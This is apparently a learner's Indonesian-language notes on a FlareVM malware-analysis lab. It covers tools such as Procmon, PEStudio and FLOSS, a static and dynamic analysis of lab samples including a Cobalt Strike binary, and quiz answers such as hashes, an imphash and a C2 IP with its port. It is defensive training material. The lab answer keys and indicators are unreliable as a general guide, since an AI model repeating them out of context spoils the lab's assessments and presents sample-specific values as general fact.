  • Process Monitor – Monitoring aktivitas proses dan thread secara real-time.

Inti Konsep Penggunaan FlareVM

FlareVM bukan untuk menguasai semua tools sekaligus. Tujuan utamanya adalah:

  • Menyediakan satu lingkungan lengkap dengan berbagai tool
  • Membantu analis memilih tool yang paling sesuai dengan tugas tertentu
  • Memberi gambaran besar tentang workflow investigasi malware dan forensik
  • Which tool is an Open-source debugger for binaries in x64 and x32 formats?

x64dbg

  • What tool is designed to analyze and edit Portable Executable (PE) files?

CFF Explorer

  • Which tool is considered a sophisticated memory editor and process watcher?

Process Hacker

  • Which tool is used for Disc image acquisition and analysis for forensic use?

FTK Imager

  • What tool can be used to view and edit a binary file?

HxD

Commonly Used Tools for Investigation: Overview

Fokus Tools Investigasi Dasar di FlareVM

Pada task ini, fokus diarahkan pada tools dasar yang umum digunakan dalam tahap awal investigasi malware dan forensik. Tools ini membantu analis memahami aktivitas sistem, proses, file mencurigakan, hingga lalu lintas jaringan tanpa langsung menganalisis secara mendalam.

Daftar Tools dan Nilai Investigatif

Beberapa tools utama yang digunakan beserta fungsinya:

  • Procmon – Melacak aktivitas sistem secara detail untuk malware research, troubleshooting, dan forensik.
  • Process Explorer – Melihat relasi parent–child process, DLL yang dimuat, dan path executable.
  • HxD – Menganalisis dan memodifikasi file berbahaya melalui hex editing.
  • Wireshark – Mengamati lalu lintas jaringan dan mendeteksi aktivitas mencurigakan.
  • CFF Explorer – Verifikasi integritas file, validasi sistem file, dan analisis struktur PE.
  • PEStudio – Static analysis executable tanpa menjalankan file.
  • FLOSS – Mengekstrak dan mendekode string tersembunyi atau terobfuscasi dari malware.

Process Monitor (Procmon)

1770304125122

Process Monitor adalah tool Windows yang merekam aktivitas sistem secara real-time, meliputi:

  • File system
  • Registry
  • Proses dan thread

Tool ini sangat berguna dalam malware research dan forensic investigation untuk memantau apa yang dilakukan sebuah proses terhadap sistem.

Contoh penggunaan:

  • Mel Consider filter proses lsass.exe untuk melihat aktivitasnya
  • LSASS (Local Security Authority Subsystem Service) menangani autentikasi dan sering berinteraksi dengan file penting seperti lsasrv.dll

Walaupun lsass.exe adalah proses normal, ia sering menjadi target credential dumping (misalnya oleh Mimikatz). Aktivitas mencurigakan seperti proses lain membaca atau menulis ke memori LSASS perlu diwaspadai.

Catatan: Contoh log yang ditampilkan tidak menunjukkan tanda malware.

Process Explorer (Procexp)

1770304708728

Process Explorer memberikan gambaran mendalam tentang proses yang berjalan, termasuk:

  • Parent dan child process
  • Process ID (PID)
  • User account
  • File dan DLL yang digunakan

Tool ini sangat berguna untuk:

  • Menelusuri proses yang dijalankan oleh dokumen Word, file LNK, atau ISO
  • Mendeteksi teknik abuse yang sering digunakan threat actor

Dalam contoh, Process Explorer digunakan untuk mengidentifikasi CFF Explorer dan parent process-nya.

HxD

1770304685513

HxD adalah hex editor cepat dan fleksibel untuk:

  • File
  • Memori
  • Drive berkapasitas besar

Fungsi utamanya meliputi forensic investigation, debugging, dan analisis binary mentah.

Contoh analisis:

  • File possible_medusa.txt ternyata diawali dengan signature 4D 5A, yang menandakan file executable
  • Panel ASCII menampilkan interpretasi teks
  • Data Inspector membantu melihat nilai byte dalam berbagai format (integer, float, dll)

HxD memudahkan identifikasi tipe file tersembunyi, struktur binary, dan indikasi manipulasi atau korupsi data.

CFF Explorer

1770304722959

CFF Explorer menyediakan informasi detail mengenai file PE, seperti:

  • Hash (MD5, SHA-1) untuk verifikasi integritas
  • Arsitektur file (32-bit / 64-bit)
  • Timestamp pembuatan file

Contoh:

  • File cryptominer.bin teridentifikasi sebagai 64-bit PE
  • Hash file dapat digunakan untuk validasi keaslian dan pencarian IOC
  • Berguna untuk mendeteksi sistem file yang telah dimodifikasi oleh malware

Wireshark

1770304843952

Wireshark digunakan untuk analisis lalu lintas jaringan dengan tujuan:

  • Mengidentifikasi koneksi mencurigakan
  • Menganalisis protokol
  • Mendeteksi data exfiltration atau komunikasi C2

Dalam contoh:

  • Paket menggunakan TLSv1.2 dan TCP
  • Data terenkripsi dapat menyembunyikan aktivitas berbahaya
  • Informasi yang terlihat mencakup source IP, destination IP, port, dan protocol

Wireshark menampilkan data paket dalam bentuk ASCII dan hexadecimal untuk analisis lebih lanjut.

PEstudio

1770304854799

PEStudio melakukan static analysis tanpa menjalankan executable, sehingga aman untuk investigasi awal.

Fitur utama:

  • Analisis entropy
  • Deteksi API berbahaya
  • Informasi compiler dan arsitektur

Contoh:

  • PsExec.exe dianalisis sebagai aplikasi dual-use
  • Entropy 6.596 menunjukkan kemungkinan packing/enkripsi
  • Digunakan untuk remote execution, sering disalahgunakan dalam lateral movement
  • Dibangun dengan Visual C++ 8

Walaupun sah, keberadaan PsExec di sistem terkompromi patut dicurigai dan perlu investigasi lanjutan.

FLOSS

FLOSS (FLARE Obfuscated String Solver) digunakan untuk:

  • Mengekstrak string statis
  • Mendekode string yang terobfuscasi
  • Melengkapi analisis statis malware

Contoh eksekusi:

  • FLOSS mengekstrak 189 static strings dari cobaltstrike.exe
  • String dapat berisi URL C2, path file, registry key, API call, dan konfigurasi malware
  • Tidak ditemukan decoded strings, menunjukkan kemungkinan obfuscation dinamis

Malware sering menyembunyikan string untuk mengaburkan perilaku berbahaya, sehingga FLOSS sangat penting dalam tahap awal analisis.

cd ..
floss .\sample\cobaltstrike.exe
  • Which tool was formerly known as FireEye Labs Obfuscated String Solver?

FLOSS

  • Which tool offers in-depth insights into the active processes running on your computer?

Process Explorer

  • By using the Process Explorer (procexp) tool, under what process can we find smss.exe?

System

  • Which powerful Windows tool is designed to help you record issues with your system's apps?

Procmon

  • Which tool can be used for Static analysis or studying executable file properties without running the files?

PEStudio

sha256,E9627EBAAC562067759681DCEBA8DDE8D83B1D813AF8181948C549E342F67C0E
  • Using the tool PEStudio to open the file cryptominer.bin in the Desktop\Sample folder, what is the sha256 value of the file?

E9627EBAAC562067759681DCEBA8DDE8D83B1D813AF8181948C549E342F67C0E

1770305929978

  • Using the tool PEStudio to open the file cryptominer.bin in the Desktop\Sample folder, how many functions does it have?

102

  • What tool can generate file hashes for integrity verification, authenticate the source of system files, and validate their validity?

CFF Explorer

1770306179330

  • Using the tool CFF Explorer to open the file possible_medusa.txt in the Desktop\Sample folder, what is the MD5 of the file?

646698572AFBBF24F50EC5681FEB2DB7

  • Use the CFF Explorer tool to open the file possible_medusa.txt in the Desktop\Sample folder. Then, go to the DOS Header Section. What is the e_magic value of the file?

5A4D

Analyzing Malicious Files!

Gambaran Kasus Investigasi

Seorang user mengunduh file mencurigakan bernama windows.exe pada 24 September 2024 pukul 03:43 AM. File ini ditandai sebagai potensi ancaman dan dikirim ke tim investigasi untuk dianalisis. File tersebut tersedia di folder:

C:\Users\Administrator\Desktop\Sample

Pendekatan awal yang digunakan adalah static analysis untuk mengumpulkan informasi tanpa menjalankan file.

Analisis Awal Menggunakan PEstudio

PEStudio digunakan untuk mengumpulkan metadata dan indikator awal dari file windows.exe.

1770306385075

Temuan penting:

  • Hash file
    • MD5: 9FDD4767DE5AEC8E577C1916ECC3E1D6
    • SHA-1: A1BC55A7931BFCD24651357829C460FD3DC4828F
  • Hash ini disarankan untuk dicek ke database seperti VirusTotal untuk melihat apakah file sudah dikenal atau masih tergolong malware baru.

Indikasi mencurigakan:

  • File mengaku sebagai Windows Registry Editor (REGEDIT)

  • Lokasi file berada di folder download user, bukan di:

    C:\Windows\System32

    Ini menunjukkan upaya impersonation untuk mengelabui pengguna.

Metadata dan Struktur File

1770306398771

Dari informasi lanjutan PEstudio:

  • Metadata versi mengandung bahasa Rusia
    • Contoh: Редактор реестра, Операционная система Microsoft® Windows®
  • Ini mencurigakan jika lingkungan organisasi tidak menggunakan bahasa Rusia.
  • Rich Header tidak ditemukan, yang mengindikasikan file kemungkinan:
    • Dipack
    • Diobfuscate Teknik ini umum digunakan malware untuk menghindari static detection.

Analisis API dan Import Address Table (IAT)

1770306413923

PEStudio menampilkan API yang diimpor oleh executable. Dengan fitur Blacklist, API berbahaya ditampilkan di bagian atas.

Fungsi penting yang terdeteksi:

  • set_UseShellExecute
    • Mengizinkan proses menjalankan proses lain melalui OS shell
    • Umum digunakan malware untuk spawn proses tambahan
  • CryptoStream, RijndaelManaged, CipherMode, CreateDecryptor
    • Mengindikasikan penggunaan AES (Rijndael) encryption
    • Bisa digunakan untuk:
      • Enkripsi komunikasi
      • Proteksi payload
      • Ransomware atau C2 traffic

Analisis String Menggunakan FLOSS

FLOSS digunakan untuk mengekstrak string statis dari windows.exe.

Perintah yang dijalankan:

FLOSS.exe .\windows.exe > windows.txt

Hasil analisis:

  • FLOSS hanya mengekstrak static strings
  • Tidak ada deobfuscation string karena:
    • File merupakan .NET binary
    • FLOSS belum mendukung deobfuscation string khusus .NET
  • String yang ditemukan konsisten dengan API yang terdeteksi di PEstudio

Ini menguatkan hasil static analysis sebelumnya.

Analisis Dinamis: Process Explorer

Untuk analisis perilaku, file cobaltstrike.exe digunakan sebagai contoh dynamic analysis.

Langkah:

  • Menjalankan file cobaltstrike.exe
  • Membuka Process Explorer

1770306448867

Temuan:

  • Explorer.exe sebagai parent process
  • cobaltstrike.exe sebagai child process
  • Process ID (PID) teridentifikasi (contoh: 4756, bisa berbeda tiap mesin)

Fokus utama adalah tab TCP/IP untuk melihat aktivitas jaringan.

Deteksi Koneksi Jaringan

1770306470708

Dari tab TCP/IP di Process Explorer:

  • Terlihat bahwa cobaltstrike.exe melakukan koneksi jaringan
  • Informasi ini penting untuk mendeteksi:
    • Command and Control (C2)
    • Data exfiltration

Namun, hasil ini perlu diverifikasi dengan tool lain agar akurat.

Verifikasi Menggunakan Process Monitor (Procmon)

Procmon digunakan untuk memastikan aktivitas jaringan yang sama.

1770306495415

Langkah filter:

  • Filter berdasarkan Process Name
  • Kondisi: contains
  • Nilai: cobalt
  • Action: Include

1770306501383

Hasil:

  • Procmon menampilkan aktivitas jaringan yang dilakukan oleh cobaltstrike.exe
  • Terverifikasi bahwa binary tersebut:
    • Melakukan koneksi ke IP mencurigakan
    • 47.120.46.210

1770306506495

Kesimpulan Investigasi Task Ini

Dari analisis statis dan dinamis:

  • windows.exe menunjukkan banyak indikator malware:
    • Impersonasi REGEDIT
    • Metadata mencurigakan
    • Enkripsi AES
    • Struktur PE tidak normal
  • cobaltstrike.exe terbukti:
    • Spawn sebagai child process
    • Melakukan koneksi ke IP eksternal tidak dikenal
  • Penggunaan multiple tools (PEStudio, FLOSS, Process Explorer, Procmon) sangat penting untuk:
    • Validasi hasil
    • Menghindari false positive
    • Mendapat gambaran utuh perilaku malware

praktek

  • Using PEStudio, open the file windows.exe. What is the entropy value of the file windows.exe?

7.999

<?xml version="1.0" encoding="utf-8"?>
<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">
  <assemblyIdentity version="1.0.0.0" name="Program.app"/>
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
    <security>
      <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
        <requestedExecutionLevel level="requireAdministrator" uiAccess="false" />
      </requestedPrivileges>
    </security>
  </trustInfo>
</assembly>
  • Using PEStudio, open the file windows.exe, then go to manifest (administrator section). What is the value under requestedExecutionLevel?

requireAdministrator

1770306856394

  • Which function allows the process to use the operating system's shell to execute other processes?

set_UseShellExecute

  • Which API starts with R and indicates that the executable uses cryptographic functions?

RijndaelManaged

imphash,92EEF189FB188C541CBD83AC8BA4ACF5
  • What is the Imphash of cobaltstrike.exe?

92EEF189FB188C541CBD83AC8BA4ACF5

gunakan tool FLOSS untuk mengekstrak string dari cobaltstrike.exe

floss .\sample\cobaltstrike.exe > cobaltstrike.txt
# cuma karena lama kita langsung aja cek di file cobaltstrike.txt yang ada di Desktop

atau kita coba gunakan PE Explorer untuk melihat process parent cobaltstrike.exe

jan lupa untuk filter di Process Explorer, dan merun Procmonnya, lalu baru jalankan file cobaltstrike.exe

1770307906508

47.120.46.210:hosts2-ns -> 47[.]120[.]46[.]210

  • What is the defanged IP address to which the process cobaltstrike.exe is connecting?
    • You need to provide the IP address in a defanged format, such as 192[.]168[.]3[.]77.

gunakan filter di wireshark atau process monitor untuk melihat port yang digunakan cobaltstrike.exe

ip.addr == 47.120.46.210

1770308042670

  • What is the destination port number used by cobaltstrike.exe when connecting to its C2 IP Address?
    • Use the pcapng file in the sample folder and use the filter ip.addr == 47.120.46.210

81

1770307649215

  • During our analysis, we found a process called cobaltstrike.exe. What is the parent process of cobaltstrike.exe?
    • This is the process when a user personally clicks a binary.

Explorer.exe

Defensive Security Tooling Part 1

Previous Page

Build Your Cyber Security Career

Next Page

On this page

REMnux: Getting StartedIntroductionAnalisis FileTujuanPengenalan oledump.pyIdentifikasi Macro dalam DokumenAnalisis Data Stream MacroDekompresi Macro VBAObfuscation pada ScriptRekonstruksi PowerShell CommandAktivitas Berbahaya yang DitemukanKesimpulanpraktekFake Network to Aid AnalysisDynamic Analysis dengan INetSimTujuanLingkungan Virtual MachineMesin yang DigunakanKonfigurasi INetSim di REMnuxIdentifikasi IP AddressPerubahan KonfigurasiVerifikasi KonfigurasiMenjalankan INetSimSimulasi Aktivitas Malware di AttackBoxAkses INetSim via BrowserSimulasi Download PayloadPerilaku File PalsuLaporan Koneksi INetSimMenghentikan INetSimLokasi ReportIsi LaporanKesimpulanpraktekMemory Investigation: Evidence PreprocessingInvestigasi Memory: Evidence PreprocessingTujuanKonsep Evidence PreprocessingPreprocessing Menggunakan Volatility 3Lingkungan dan FilePlugin Volatility yang Digunakanwindows.pstree.PsTreewindows.pslist.PsListwindows.cmdline.CmdLinewindows.filescan.FileScanwindows.dlllist.DllListwindows.psscan.PsScanwindows.malfind.MalfindPreprocessing Massal dengan LoopTujuanKonsep Perintah LoopHasilPreprocessing Menggunakan StringsTujuanJenis String yang DiekstrakASCII StringsUnicode Little EndianUnicode Big EndianOutputKesimpulanpraktekFlareVM: Arsenal of ToolsIntroductionGambaran Umum FlareVMTujuan PembelajaranPrasyaratAkses Mesin Virtual (VM)Akses via Remote Desktop (RDP)Lokasi File SampelCatatan Keamanan (Disclaimer)Arsenal of ToolsGambaran Umum Tools di FlareVMReverse Engineering & DebuggingDisassemblers & DecompilersStatic & Dynamic AnalysisForensics & Incident ResponseNetwork AnalysisFile AnalysisScripting & AutomationSysinternals SuiteInti Konsep Penggunaan FlareVMCommonly Used Tools for Investigation: OverviewFokus Tools Investigasi Dasar di FlareVMDaftar Tools dan Nilai InvestigatifProcess Monitor (Procmon)Process Explorer (Procexp)HxDCFF ExplorerWiresharkPEstudioFLOSSAnalyzing Malicious Files!Gambaran Kasus InvestigasiAnalisis Awal Menggunakan PEstudioMetadata dan Struktur FileAnalisis API dan Import Address Table (IAT)Analisis String Menggunakan FLOSSAnalisis Dinamis: Process ExplorerDeteksi Koneksi JaringanVerifikasi Menggunakan Process Monitor (Procmon)Kesimpulan Investigasi Task Inipraktek